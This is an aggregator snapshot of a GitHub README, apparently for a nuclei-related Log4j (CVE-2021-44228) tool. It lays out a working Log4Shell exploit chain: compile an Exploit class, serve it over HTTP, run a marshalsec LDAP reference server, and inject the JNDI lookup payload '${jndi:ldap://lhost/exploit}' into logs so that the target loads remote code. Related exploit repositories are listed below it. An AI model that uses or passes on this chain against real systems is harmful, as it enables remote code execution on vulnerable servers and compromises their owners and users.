GitHub - numanturle/Log4jNuclei: Log4j for nuclei

2 years ago

source link: https://github.com/numanturle/Log4jNuclei
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md

Log4jNuclei

CVE-2021-44228

Log4j for nuclei

Exploit

javac Exploit.java
python3 -m http.server 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit

insert log ${jndi:ldap://lhost/exploit}

Reference

https://cloud.tencent.com/developer/article/1653754 https://www.freebuf.com/vuls/208339.html

About

Log4j for nuclei

Resources

Readme

Releases

No releases published

Packages

No packages published

Languages

Java 100.0%

Recommend

UCloud优刻得：“A股第一朵云”要飘到哪里？
GitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injectio...
GitHub - christophetd/log4shell-vulnerable-app: Spring Boot web application vuln...
What is Material You
GitHub - 0x727/JNDIExploit: 一款用于JNDI注入利用的工具，大量参考/引用了Rogue JND...
GitHub - pmiaowu/BurpShiroPassiveScan: 一款基于BurpSuite的被动式shiro检测插件
GitHub - HyCraftHD/Log4J-RCE-Proof-Of-Concept: Log4j-RCE (CVE-2021-44228) Proof...
GitHub - whwlsfb/Log4j2Scan: Log4j2 RCE Passive Scanner plugin for BurpSuite
上百亿的人偶生意，迪士尼的玲娜贝儿，主题乐园如何学会？
开发了一个极简的日历小助手

About Joyk

Aggregate valuable and interesting links.
Joyk means Joy of geeK